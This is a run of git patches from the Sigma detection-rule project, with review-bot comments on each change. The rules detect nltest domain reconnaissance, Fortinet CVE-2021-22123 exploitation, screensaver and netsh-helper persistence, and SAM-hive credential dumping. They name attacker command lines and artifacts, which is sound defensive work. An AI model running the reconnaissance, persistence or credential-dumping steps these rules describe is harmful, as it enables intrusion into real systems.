@@ -7,7 +7,7 @@ from uuid import uuid4, UUID import yaml from sigma.output import SigmaYAMLDumper -argparser = ArgumentParser(description="Assign and verfify UUIDs of Sigma rules") +argparser = ArgumentParser(description="Assign and verify UUIDs of Sigma rules") argparser.add_argument("--verify", "-V", action="store_true", help="Verify existence and uniqueness of UUID assignments. Exits with error code if verification fails.") argparser.add_argument("--verbose", "-v", action="store_true", help="Be verbose.") argparser.add_argument("--recursive", "-r", action="store_true", help="Recurse into directories.") diff --git a/tools/sigma/sigma_uuid.py b/tools/sigma/sigma_uuid.py index 2a8b003c..9ec32b71 100755 --- a/tools/sigma/sigma_uuid.py +++ b/tools/sigma/sigma_uuid.py @@ -15,7 +15,7 @@ def yaml_preserve_order(self, dict_data): return self.represent_mapping("tag:yaml.org,2002:map", dict_data.items()) def main(): - argparser = ArgumentParser(description="Assign and verfify UUIDs of Sigma rules") + argparser = ArgumentParser(description="Assign and verify UUIDs of Sigma rules") argparser.add_argument("--verify", "-V", action="store_true", help="Verify existence and uniqueness of UUID assignments. Exits with error code if verification fails.") argparser.add_argument("--verbose", "-v", action="store_true", help="Be verbose.") argparser.add_argument("--recursive", "-r", action="store_true", help="Recurse into directories.") diff --git a/tools/sigma/sigmac.py b/tools/sigma/sigmac.py index f74944fd..350ffb86 100755 --- a/tools/sigma/sigmac.py +++ b/tools/sigma/sigmac.py 
@@ -114,7 +114,7 @@ def set_argparser(): available additional fields : title, id, status, description, author, references, fields, falsepositives, level, tags. This option do not have any effect for backends that already format output : elastalert, kibana, splukxml etc. """) argparser.add_argument("--output-format", "-oF", choices=["json", "yaml"], help="Use only if you want to have JSON or YAML output (default is raw text)") - argparser.add_argument("--output-extention", "-e", default=None, help="Extention of Output file for filename prefix use") + argparser.add_argument("--output-extention", "-e", default=None, help="Extension of Output file for filename prefix use") argparser.add_argument("--print0", action="store_true", help="Delimit results by NUL-character") argparser.add_argument("--backend-option", "-O", action="append", help="Options and switches that are passed to the backend") argparser.add_argument("--backend-config", "-C", help="Configuration file (YAML format) containing options to pass to the backend") From 5553534d7cf884304ad39fc9ee28936bb18e6bdf Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 18 Aug 2021 14:29:02 -0500 Subject: [PATCH 0437/1367] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 2aeae254..424533b5 100644 --- a/README.md +++ b/README.md @@ -304,7 +304,7 @@ S2AN was developed to be used as a standalone tool or as part of a CI/CD pipelin The directory `contrib` contains scripts that were contributed by the community: -* `sigma2elastalert.py`i by David Routine: A script that converts Sigma rules to Elastalert configurations. This tool +* `sigma2elastalert.py`i by David Routin: A script that converts Sigma rules to Elastalert configurations. This tool uses *sigmac* and expects it in its path. These tools are not part of the main toolchain and maintained separately by their authors. From 92b72ffdc19128d876f178fd3e660cdd93e27215 Mon Sep 17 00:00:00 2001 
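Review bot: The help text now says "Extension" but the option itself is still spelled `--output-extention`, so the user-facing flag and its description disagree. Renaming the flag outright would break existing invocations; argparse accepts several option strings for one argument, so `argparser.add_argument("--output-extension", "--output-extention", "-e", dest="output_extention", default=None, help="Extension of Output file for filename prefix use")` documents the correct spelling while keeping the old one and the existing `output_extention` attribute working. `set_argparser` starts and ends outside the hunk.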
From: gs3cl <89155053+gs3cl@users.noreply.github.com> Date: Wed, 18 Aug 2021 20:45:18 +0000 Subject: [PATCH 0438/1367] Update win_nltest_query.yml modification based on new reports 1.https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11) -> for (selection_recon1 and seletion_recon2") 2.https://book.hacktricks.xyz/windows/basic-cmd-for-pentesters -> nltest example 3.MITRE reference just for reference to MITRE to gain more insights 4.https://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/ -> new Report about Trickbot with reference and usage of "nltest" therefore I included the option in this rule --- .../process_creation/win_nltest_query.yml | 51 ++++++++++++------- 1 file changed, 34 insertions(+), 17 deletions(-) diff --git a/rules/windows/process_creation/win_nltest_query.yml b/rules/windows/process_creation/win_nltest_query.yml index b42648cc..2a095dba 100644 --- a/rules/windows/process_creation/win_nltest_query.yml +++ b/rules/windows/process_creation/win_nltest_query.yml 
@@ -1,24 +1,41 @@ -title: Nltest Credential Hash Theft -id: 5cc90652-4cbd-4241-aa3b-4b462fa5a248 -description: Detects nltest query commands which may leak credential hashes +title: Nltest Usage +description: Detects nltest commands that can be used for information discovery references: - - https://twitter.com/sysopfb/status/986799053668139009 - - https://github.com/LOLBAS-Project/LOLBAS/blob/94368c1e69a6ce5ce812f2b331c99b89a63791b9/yml/LOLUtilz/OSBinaries/Nltest.yml -date: 2018/04/18 -modified: 2021/01/05 -tags: - - attack.credential_access - - attack.t1003 +- https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11) +- https://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/ +- https://attack.mitre.org/techniques/T1482/ +- https://attack.mitre.org/techniques/T1016/ +- https://book.hacktricks.xyz/windows/basic-cmd-for-pentesters status: experimental -author: Craig Young, oscd.community +author: Craig Young, oscd.community, Georg Lauenstein +date: 2021/07/24 +modified: 2021/08/17 +tags: + - attack.discovery + - attack.T1016 + - attack.T1482 logsource: - category: process_creation - product: windows + category: process_creation + product: windows detection: - selection: + selection_nltest: Image|endswith: '\nltest.exe' - CommandLine|contains: '\query' - condition: selection + selection_recon1: + CommandLine|contains|all: + - '/server' + - '/query' + selection_recon2: + CommandLine|startswith: + - '/dclist:' + - '/parentdomain' + - '/domain_trusts' + - '/user' + condition: selection_nltest AND (selection_recon1 OR selection_recon2) falsepositives: - - Legitimate administration + - To be determined level: medium +fields: + - Image + - User + - CommandLine + - ParentCommandLine From 6ccff2cff512ba11177b83bd492c31d711e3f6b7 Mon Sep 17 00:00:00 2001 
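Review bot: The rewrite drops the rule's `id:` line and replaces the original `date: 2018/04/18` with `date: 2021/07/24`, so the rule loses its stable identifier and its creation date even though the hunk itself uses the `date`/`modified` pair that is meant to carry that history; keeping `id: 5cc90652-4cbd-4241-aa3b-4b462fa5a248` and the 2018 date and putting the new date only in `modified:` preserves both. `selection_recon2` uses `CommandLine|startswith` with values like `'/dclist:'`, which cannot match a command line that begins with the executable path; `CommandLine|contains`, as used in `selection_recon1`, is what the values need. The uppercase `AND`/`OR` in the condition and the `attack.T1016`/`attack.T1482` tags also differ from the lowercase form every other rule on this page uses, and `falsepositives: - To be determined` leaves the analyst with nothing to triage against.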
From: Young Date: Wed, 18 Aug 2021 18:15:18 -0700 Subject: [PATCH 0439/1367] Added support for threshold rules --- .DS_Store | Bin 8196 -> 8196 bytes tools/config/winlogbeat.yml | 2 +- tools/osMonitor.json | 2 +- tools/sigma/backends/opensearch.py | 101 +++++++++++++++++++++++++---- 4 files changed, 92 insertions(+), 13 deletions(-) diff --git a/.DS_Store b/.DS_Store index 8ec7eb62074302687bee5f8d1e0690ea3c2ceae7..b70b452d0071309beb8e844f281cb3104d236e61 100644 GIT binary patch delta 31 ecmZp1XmQx!EXrhRHhGnh%jQneUF-;UH4^};AqsH- delta 25 bcmZp1XmQx!EIN6GklW@?(Ov9NMl}-vfwBpg diff --git a/tools/config/winlogbeat.yml b/tools/config/winlogbeat.yml index d640f433..5e913928 100644 --- a/tools/config/winlogbeat.yml +++ b/tools/config/winlogbeat.yml @@ -10,7 +10,7 @@ backends: - elastalert - elastalert-dsl - ee-outliers - - os-monitor + - opensearch-monitor logsources: windows: product: windows diff --git a/tools/osMonitor.json b/tools/osMonitor.json index 80a0c98d..04ff119a 100644 --- a/tools/osMonitor.json +++ b/tools/osMonitor.json 
@@ -1 +1 @@ -{"type": "monitor", "name": "QuarksPwDump Clearing Access History", "description": "Detects QuarksPwDump clearing access history in hive", "enabled": true, "schedule": {"period": {"interval": 5, "unit": "MINUTES"}}, "inputs": [{"search": {"indices": ["opensearch-security-logs"], "query": {"size": 1, "aggregations": {}, "query": {"bool": {"should": [{"bool": {"must": [{"match": {"winlog.channel": "\"System\""}}, {"match": {"winlog.event_id": "\"16\""}}]}}, {"bool": {"should": [{"match": {" winlog.event_data.HiveName.keyword": "*\\\\AppData\\\\Local\\\\Temp\\\\SAM* "}}, {"match": {" winlog.event_data.HiveName.keyword": "*.dmp"}}]}}]}}}}}], "tags": ["Credential Access", "T1003", "T1003.002"], "triggers": [{"name": "generated-trigger", "severity": "1", "condition": {"script": {"source": "ctx.results[0].hits.total.value > 0", "lang": "painless"}}, "actions": []}], "sigma_meta_data": {"rule_id": "39f919f3-980b-4e6f-a975-8af7e507ef2b", "threat": [{"tactic": {"id": "TA0006", "reference": "https://attack.mitre.org/tactics/TA0006", "name": "Credential Access"}, "framework": "MITRE ATT&CK\u00ae", "technique": [{"id": "T1003", "name": "OS Credential Dumping", "reference": "https://attack.mitre.org/techniques/T1003"}]}]}} +{"description": "Detects rare scheduled tasks creations that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious code", "enabled": true, "false_positives": ["Software installation", "Software updates"], "filters": [], "from": "now-360s", "immutable": false, "index": ["winlogbeat-*"], "interval": "5m", "rule_id": "b0d77106-7bb0-41fe-bd94-d1752164d066", "language": "lucene", "output_index": ".siem-signals-default", "max_signals": 100, "risk_score": 5, "name": "Rare Schtasks Creations", "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4698\")", "meta": {"from": "1m"}, "severity": "low", "tags": ["Execution", "Privilege Escalation", "Persistence", "T1053", "T1053.005"], 
"to": "now", "type": "threshold", "threat": [{"tactic": {"id": "TA0002", "reference": "https://attack.mitre.org/tactics/TA0002", "name": "Execution"}, "framework": "MITRE ATT&CK\u00ae", "technique": [{"id": "T1053", "name": "Scheduled Task/Job", "reference": "https://attack.mitre.org/techniques/T1053"}]}, {"tactic": {"id": "TA0004", "reference": "https://attack.mitre.org/tactics/TA0004", "name": "Privilege Escalation"}, "framework": "MITRE ATT&CK\u00ae", "technique": [{"id": "T1053", "name": "Scheduled Task/Job", "reference": "https://attack.mitre.org/techniques/T1053"}]}, {"tactic": {"id": "TA0003", "reference": "https://attack.mitre.org/tactics/TA0003", "name": "Persistence"}, "framework": "MITRE ATT&CK\u00ae", "technique": [{"id": "T1053", "name": "Scheduled Task/Job", "reference": "https://attack.mitre.org/techniques/T1053"}]}], "version": 1, "threshold": {"field": "winlog.event_data.TaskName", "value": 6}} diff --git a/tools/sigma/backends/opensearch.py b/tools/sigma/backends/opensearch.py index f26b75b2..1e034800 100644 --- a/tools/sigma/backends/opensearch.py +++ b/tools/sigma/backends/opensearch.py @@ -21,6 +21,7 @@ import sys import os from random import randrange from distutils.util import strtobool +from typing import List, Tuple, Union from uuid import uuid4 import sigma 
@@ -35,6 +36,63 @@ from .exceptions import NotSupportedError from .elasticsearch import ElasticsearchQuerystringBackend from .defaultOpensearchValues import * +class Atom: + def __init__(self, field: str, prop: str) -> None: + self.field = field + self.prop = prop + +class Group: + def __init__(self) -> None: + pass + +class Boolean: + def __init__(self, expression: Union[Atom, Group]) -> None: + self.expression = expression + +class Ary: + def __init__(self, bool1: Boolean, bool2: List[Tuple[str, Boolean]] = None) -> None: + self.bool1 = bool1 + self.bool2 = bool2 + +def group_init(self, ary:Ary): + self.ary = ary + +Group.__init__ = group_init + +def parseAtom(s: str) -> Atom: + return Atom(s.split(":")[0], s.split(":")[0]) + +def parseGroup(s: str) -> Group: + return Group(parseAry(s[1:-1])) + +def expandGroup(s: str) -> str: + field = s.strip("()").split(":")[0] + props = s.strip("()").split(":")[1].strip("()").split() + print(props) + newGroup = [] + + for index in range(len(props)): + element = props[index] + if index%2 == 0: + newGroup.append(f'{field}: {element}') + else: + newGroup.append(element) + + return "(" + "".join(newGroup) + ")" + +def parseBoolean(s: str) -> Boolean: + if not s.contains("("): + expression = parseAtom(s) + else: + if s[0] != '(': + s = expandGroup(s) + expression = parseGroup(s) + + return Boolean(expression) + +def parseAry(s: str) -> Ary: + pass + class OpenSearchBackend(object): """OpenSearch detection rule backend.""" active = True @@ -46,6 +104,7 @@ class OpenSearchBackend(object): ("dest_base_url", "https://github.com/SigmaHQ/sigma/tree/master/", "The URL prefix", None), ("custom_tag", None , "Add custom tag. for multi split with a comma tag1,tag2 ", None), ) + isThreshold = False def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) 
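Review bot: The new parser helpers in the `@@ -35,6 +36,63 @@` hunk cannot run as written: `parseAtom` builds `Atom(s.split(":")[0], s.split(":")[0])`, so the property is always a copy of the field name and should come from one `field, prop = s.split(":", 1)`; `parseBoolean` calls `s.contains("(")`, which does not exist on `str` and raises AttributeError on first use, where `if "(" not in s:` is the idiom; and `parseAry` is a bare `pass`, so `parseGroup` wraps `None`. `expandGroup` also leaves a `print(props)` debug line in library code, and patching `Group.__init__` after the fact to dodge the forward reference is avoidable by annotating the parameter with the string `"Ary"`. If these helpers are not yet wired into `build_query`, a module comment such as `# NOTE: draft query-tree parser, not yet used by build_query` would stop readers from relying on them.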
@@ -154,14 +213,27 @@ class OpenSearchBackend(object): } ] + def build_threshold(self, field, inequality, threshold): + INEQUALITIES = {"<": "lt", "<=": "lte", ">": "gt", ">=": "gte"} + + return { + "range": { + field: { + INEQUALITIES[inequality]: threshold + } + } + } + ''' Builds OpenSearch monitor query from translated Elastic Common Schema query. - Only supports must and should clauses. ''' def build_query(self, translation): - translation = "(winlog.channel:\"System\" AND winlog.event_id:\"16\" OR winlog.event_data.HiveName.keyword:*\\\\AppData\\\\Local\\\\Temp\\\\SAM* OR winlog.event_data.HiveName.keyword:*.dmp)" + # print(f'\nparsed translation: {translation.strip("()").split("OR")}\n') + translation = "(winlog.channel:\"System\" AND winlog.event_id:\"16\" AND winlog.event_data.HiveName.keyword:*\\\\AppData\\\\Local\\\\Temp\\\\SAM* AND winlog.event_data.HiveName.keyword:*.dmp)" # translation = "(winlog.channel:\"System\"" parsedTranslation = translation.strip("()").split("OR") + + print(f'\nExpanded group: {expandGroup("winlog.event_data.DestAddress.keyword:(127.* OR 121)")}\n') if len(parsedTranslation) == 0: return {} @@ -216,11 +288,20 @@ class OpenSearchBackend(object): # If only one type of clause, don't use nested bool object if len(clauses) > 1: - return { - "bool": { - "should": clauses + if self.isThreshold: + self.isThreshold = False + return { + "bool": { + "should": clauses, + "filter": self.rule_threshold + } + } + else: + return { + "bool": { + "should": clauses + } } - } return clauses[0] ''' @@ -390,7 +471,7 @@ class OpenSearchQsBackend(OpenSearchBackend, ElasticsearchQuerystringBackend): Backend class containing the identifier for the -t argument. Can inherit from ElasticsearchQuerystringBackend since query string in both OpenSearch monitors and ElasticRule are in Elastic Common Schema. ''' - identifier = "os-monitor" + identifier = "opensearch-monitor" def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) 
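Review bot: `build_query` in the `@@ -154,14 +213,27 @@` hunk still overwrites its `translation` argument with a hard-coded SAM-hive query string and now adds a second debug `print(f'\nExpanded group: ...')`, so every rule compiled through this backend yields the same monitor regardless of input; the assignment and both prints should go before this merges. In the `@@ -216,11 +288,20 @@` hunk the threshold case places `self.rule_threshold` in `bool.filter` next to the `should` list, and in an OpenSearch/Elasticsearch bool query the presence of a `filter` (or `must`) clause makes `should` clauses optional, so the detection clauses stop being required and the range filter alone matches; `"should": clauses, "minimum_should_match": 1, "filter": self.rule_threshold` restores the intended semantics. `build_threshold` also emits `{"range": {field: {...}}}` keyed on `agg.groupfield`, which compares each document's field value against the threshold rather than counting matches per group, so a count-based threshold seems to need an aggregation instead; confirm against the intended monitor format. Resetting `self.isThreshold` inside `build_query` keeps per-rule state in an attribute shared until it is flipped back; passing the threshold into `build_query` explicitly would be clearer.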
@@ -400,9 +481,7 @@ class OpenSearchQsBackend(OpenSearchBackend, ElasticsearchQuerystringBackend): raise NotImplementedError("Threshold rules can only handle > and >= operators") if agg.aggfield: raise NotImplementedError("Threshold rules cannot COUNT(DISTINCT %s)" % agg.aggfield) - self.rule_threshold = { - "field": agg.groupfield if agg.groupfield else [], - "value": int(agg.condition) if agg.cond_op == ">=" else int(agg.condition) + 1 - } + self.isThreshold = True + self.rule_threshold = self.build_threshold(agg.groupfield, agg.cond_op, agg.condition) return "" raise NotImplementedError("Aggregation %s is not implemented for this backend" % agg.aggfunc_notrans) \ No newline at end of file From df829f0d45ee5ca6c73b15b68ef91eb7cd513126 Mon Sep 17 00:00:00 2001 From: gs3cl <89155053+gs3cl@users.noreply.github.com> Date: Thu, 19 Aug 2021 08:26:33 +0200 Subject: [PATCH 0440/1367] Update and rename win_nltest_query.yml to win_nltest_recon.yml changes based on feedback added Update and rename win_nltest_query.yml to win_nltest_recon.yml --- .../{win_nltest_query.yml => win_nltest_recon.yml} | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) rename rules/windows/process_creation/{win_nltest_query.yml => win_nltest_recon.yml} (87%) diff --git a/rules/windows/process_creation/win_nltest_query.yml b/rules/windows/process_creation/win_nltest_recon.yml similarity index 87% rename from rules/windows/process_creation/win_nltest_query.yml rename to rules/windows/process_creation/win_nltest_recon.yml index 2a095dba..f025c321 100644 --- a/rules/windows/process_creation/win_nltest_query.yml +++ b/rules/windows/process_creation/win_nltest_recon.yml @@ -1,4 +1,5 @@ -title: Nltest Usage +title: Detect Recon Activity with nltest +id: 5cc90652-4cbd-4241-aa3b-4b462fa5a248 description: Detects nltest commands that can be used for information discovery references: - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11) 
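Review bot: The new `self.rule_threshold = self.build_threshold(agg.groupfield, agg.cond_op, agg.condition)` drops two things the replaced lines handled: `agg.groupfield` is no longer guarded (the old code had `if agg.groupfield else []`), so a `count()` aggregation without a `by` field produces a range clause keyed on `None`, and `agg.condition` is passed through unconverted where the old code applied `int(...)`. A guard such as `if not agg.groupfield: raise NotImplementedError("Threshold rules require a 'by' field")` before the call, plus `int(agg.condition)` at the call site, keeps the earlier behaviour. The enclosing method starts outside the hunk.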
@@ -9,7 +10,7 @@ references: status: experimental author: Craig Young, oscd.community, Georg Lauenstein date: 2021/07/24 -modified: 2021/08/17 +modified: 2021/08/19 tags: - attack.discovery - attack.T1016 @@ -32,7 +33,7 @@ detection: - '/user' condition: selection_nltest AND (selection_recon1 OR selection_recon2) falsepositives: - - To be determined + - Legitimate administration use but user must be check out level: medium fields: - Image From 0c6db48ceb5b02893900437f1042064e3b48b2d2 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Thu, 19 Aug 2021 08:27:15 +0200 Subject: [PATCH 0441/1367] Update web_fortinet_cve_2021_22123_exploit.yml --- .../web/web_fortinet_cve_2021_22123_exploit.yml | 16 +++++++++------- 1 file changed, 9 insertions(+), 7 deletions(-) diff --git a/rules/web/web_fortinet_cve_2021_22123_exploit.yml b/rules/web/web_fortinet_cve_2021_22123_exploit.yml index 42615b9d..f50aa501 100644 --- a/rules/web/web_fortinet_cve_2021_22123_exploit.yml +++ b/rules/web/web_fortinet_cve_2021_22123_exploit.yml @@ -1,10 +1,11 @@ title: Fortinet CVE-2021-22123 Exploitation description: Detects CVE-2021-22123 exploitation attempt against Fortinet WAFs id: f425637f-891c-4191-a6c4-3bb1b70513b4 +status: experimental references: - https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection -author: Bhabesh Raj -date: 2021/08/18 +author: Bhabesh Raj, Florian Roth +date: 2021/08/19 tags: - attack.initial_access - attack.t1190 @@ -16,11 +17,12 @@ detection: - '/api/v2.0/user/remoteserver.saml' cs-method: - POST - content-type|startswith: - - 'multipart/form-data;' - content-disposition|contains: - - '`' - condition: selection + filter1: + cs-referer|contains: '/root/user/remote-user/saml-user/' + filter2: + cs-referer: + - null + condition: selection and not filter1 and not filter2 fields: - client_ip - url From 2cdab46ee4ebc013a45a7a156f96756d50592935 Mon Sep 17 00:00:00 2001 
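Review bot: In the second Fortinet hunk the selection no longer checks `content-type` or the backtick in `content-disposition`, and the condition now also excludes `filter2` (requests with no `cs-referer` at all), so the rule fires only on POSTs to the SAML endpoint that carry a Referer other than the UI path; whether a missing Referer should suppress the alert or count toward it deserves a comment on `filter2`, because the content-based indicator that tied the alert to the injection pattern is gone and the Referer header is supplied by the client. `filter2` is written as a one-element list `cs-referer: - null`, which other rules on this page express as `cs-referer: null`. The commit also overwrites `date: 2021/08/18` with `date: 2021/08/19` instead of adding `modified: 2021/08/19`, which loses the creation date.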
From: frack113 Date: Thu, 19 Aug 2021 09:37:00 +0200 Subject: [PATCH 0442/1367] fix start errors --- tools/sigma/sigma_similarity.py | 3 +-- tools/sigma_similarity | 2 +- 2 files changed, 2 insertions(+), 3 deletions(-) diff --git a/tools/sigma/sigma_similarity.py b/tools/sigma/sigma_similarity.py index 5167bcb5..ad911c57 100755 --- a/tools/sigma/sigma_similarity.py +++ b/tools/sigma/sigma_similarity.py @@ -68,9 +68,8 @@ def main(): if args.primary: with open(args.primary, "r") as f: primary_paths = { pathname.strip() for pathname in f.readlines() } - parsed = { - str(path): SigmaCollectionParser(path.open().read()) + str(path): SigmaCollectionParser(path.open(encoding='utf-8').read()) for path in paths } converted = { diff --git a/tools/sigma_similarity b/tools/sigma_similarity index 782531b5..94f3a30d 100755 --- a/tools/sigma_similarity +++ b/tools/sigma_similarity @@ -1,5 +1,5 @@ #!/usr/bin/env python3 -from sigma.sigmac import main +from sigma.sigma_similarity import main main() From b4a029ac3c40d2297abbf4d197ae2d4c368b3625 Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 19 Aug 2021 13:55:09 +0200 Subject: [PATCH 0443/1367] Add win_susp_screensaver_reg.yml --- .../win_susp_netsh_dll_persistence.yml | 6 +-- .../win_susp_screensaver_reg.yml | 52 +++++++++++++++++++ 2 files changed, 55 insertions(+), 3 deletions(-) create mode 100644 rules/windows/process_creation/win_susp_screensaver_reg.yml diff --git a/rules/windows/process_creation/win_susp_netsh_dll_persistence.yml b/rules/windows/process_creation/win_susp_netsh_dll_persistence.yml index 20eaa79e..3ee75393 100644 --- a/rules/windows/process_creation/win_susp_netsh_dll_persistence.yml +++ b/rules/windows/process_creation/win_susp_netsh_dll_persistence.yml 
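Review bot: `path.open(encoding='utf-8').read()` fixes the decoding but the handle is still never closed, and the `with open(args.primary, "r")` line a few lines up in the same hunk still opens with the platform default encoding, so the same decode error this commit addresses can recur there. `str(path): SigmaCollectionParser(path.read_text(encoding='utf-8'))` reads and closes in one call, and adding `encoding='utf-8'` to the `open(args.primary, ...)` call makes the two consistent. `main` starts and ends outside the hunk.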
@@ -3,12 +3,12 @@ id: 56321594-9087-49d9-bf10-524fe8479452 description: Detects persitence via netsh helper status: test references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1128/T1128.md + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md + - https://attack.mitre.org/software/S0108/ tags: - - attack.persistence + - attack.privilege_escalation - attack.t1546.007 - attack.s0108 - - attack.t1128 # an old one date: 2019/10/25 modified: 2020/08/30 author: Victor Sergeev, oscd.community diff --git a/rules/windows/process_creation/win_susp_screensaver_reg.yml b/rules/windows/process_creation/win_susp_screensaver_reg.yml new file mode 100644 index 00000000..5d49d1c8 --- /dev/null +++ b/rules/windows/process_creation/win_susp_screensaver_reg.yml 
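Review bot: The tag change swaps `attack.persistence` for `attack.privilege_escalation` while the description two lines above still reads `Detects persitence via netsh helper` (also misspelled); T1546.007 sits under both tactics in ATT&CK, so keeping `- attack.persistence` alongside the new tag matches the description. `modified: 2020/08/30` is left untouched although the references and tags change in this hunk; other rule edits on this page bump `modified:` in the same commit.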
@@ -0,0 +1,52 @@ +title: Suspicious ScreenSave Change by Reg.exe +id: 0fc35fc3-efe6-4898-8a37-0b233339524f +status: experimental +author: frack113 +date: 2021/08/19 +description: | + Adversaries may establish persistence by executing malicious content triggered by user inactivity. + Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md + - https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf +tags: + - attack.privilege_escalation + - attack.t1546.002 +logsource: + category: process_creation + product: windows +detection: + selection_reg: + Image|endswith: reg.exe + CommandLine|contains: + - 'HKEY_CURRENT_USER\Control Panel\Desktop' + - 'HKCU\Control Panel\Desktop' + selection_option_1: # /force Active ScreenSaveActive + CommandLine|contains|all: + - '/v ScreenSaveActive' + - '/t REG_SZ' + - '/d 1' + - '/f' + selection_option_2: # /force set ScreenSaveTimeout + CommandLine|contains|all: + - '/v ScreenSaveTimeout' + - '/t REG_SZ' + - '/d ' + - '/f' + selection_option_3: # /force set ScreenSaverIsSecure + CommandLine|contains|all: + - '/v ScreenSaverIsSecure' + - '/t REG_SZ' + - '/d 0' + - '/f' + selection_option_4: # /force set a .scr + CommandLine|contains|all: + - '/v SCRNSAVE.EXE' + - '/t REG_SZ' + - '/d ' + - '.scr' + - '/f' + condition: selection_reg and 1 of selection_option_* +falsepositives: + - GPO +level: medium \ No newline at end of file From bf9ac21ebcb97f5f82fc6fdd7c517433700224b4 Mon Sep 17 00:00:00 2001 From: gs3cl <89155053+gs3cl@users.noreply.github.com> Date: Thu, 19 Aug 2021 14:12:00 +0200 Subject: [PATCH 0444/1367] Update win_nltest_recon.yml change "startswith" to "contains" --- rules/windows/process_creation/win_nltest_recon.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
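Review bot: `Image|endswith: reg.exe` has no leading path separator, so any image whose name merely ends in "reg.exe" matches; the other process_creation rules on this page write the form `Image|endswith: '\reg.exe'`. `selection_option_2` requires only `/v ScreenSaveTimeout`, `/t REG_SZ`, `/d ` and `/f`, which also covers routine timeout changes, so `falsepositives` might list user or helpdesk configuration next to GPO. The only tag is `attack.privilege_escalation` while the description is about persistence; T1546.002 belongs to both tactics, so adding `- attack.persistence` aligns the tags with the text.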
diff --git a/rules/windows/process_creation/win_nltest_recon.yml b/rules/windows/process_creation/win_nltest_recon.yml index f025c321..ca20c9f4 100644 --- a/rules/windows/process_creation/win_nltest_recon.yml +++ b/rules/windows/process_creation/win_nltest_recon.yml @@ -26,7 +26,7 @@ detection: - '/server' - '/query' selection_recon2: - CommandLine|startswith: + CommandLine|contains: - '/dclist:' - '/parentdomain' - '/domain_trusts' From 60931d09b93aa8346c17e158afb9ce6968b033dc Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Thu, 19 Aug 2021 14:24:54 +0200 Subject: [PATCH 0445/1367] fix title error --- rules/windows/process_creation/win_nltest_recon.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_nltest_recon.yml b/rules/windows/process_creation/win_nltest_recon.yml index ca20c9f4..ecf2762e 100644 --- a/rules/windows/process_creation/win_nltest_recon.yml +++ b/rules/windows/process_creation/win_nltest_recon.yml @@ -1,4 +1,4 @@ -title: Detect Recon Activity with nltest +title: Recon Activity with NLTEST id: 5cc90652-4cbd-4241-aa3b-4b462fa5a248 description: Detects nltest commands that can be used for information discovery references: From 08af3a94291a8b48063b317bdfaa78b16155dca0 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Thu, 19 Aug 2021 15:20:04 +0200 Subject: [PATCH 0446/1367] Cleanup errors --- .../windows/process_creation/win_nltest_recon.yml | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/rules/windows/process_creation/win_nltest_recon.yml b/rules/windows/process_creation/win_nltest_recon.yml index ecf2762e..720cc587 100644 --- a/rules/windows/process_creation/win_nltest_recon.yml +++ b/rules/windows/process_creation/win_nltest_recon.yml 
@@ -2,19 +2,19 @@ title: Recon Activity with NLTEST id: 5cc90652-4cbd-4241-aa3b-4b462fa5a248 description: Detects nltest commands that can be used for information discovery references: -- https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11) -- https://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/ -- https://attack.mitre.org/techniques/T1482/ -- https://attack.mitre.org/techniques/T1016/ -- https://book.hacktricks.xyz/windows/basic-cmd-for-pentesters + - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11) + - https://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/ + - https://attack.mitre.org/techniques/T1482/ + - https://attack.mitre.org/techniques/T1016/ + - https://book.hacktricks.xyz/windows/basic-cmd-for-pentesters status: experimental author: Craig Young, oscd.community, Georg Lauenstein date: 2021/07/24 modified: 2021/08/19 tags: - attack.discovery - - attack.T1016 - - attack.T1482 + - attack.t1016 + - attack.t1482 logsource: category: process_creation product: windows From 67020bb0ff8a3c59b6cf205e87699eca1e08792a Mon Sep 17 00:00:00 2001 From: Rachel Rice Date: Thu, 19 Aug 2021 14:24:43 +0100 Subject: [PATCH 0447/1367] Update AWS CloudTrail rules aws_elasticache_security_group_created.yml aws_elasticache_security_group_modified_or_deleted.yml Removed spaces from eventNames aws_s3_data_management_tampering.yml Fix typo in title, use s3 as eventSource aws_snapshot_backup_exfiltration.yml Use ec2 as eventSource --- rules/cloud/aws/aws_elasticache_security_group_created.yml | 3 ++- .../aws_elasticache_security_group_modified_or_deleted.yml | 7 ++++--- rules/cloud/aws/aws_s3_data_management_tampering.yml | 5 +++-- rules/cloud/aws/aws_snapshot_backup_exfiltration.yml | 4 ++-- 4 files changed, 11 insertions(+), 8 deletions(-) 
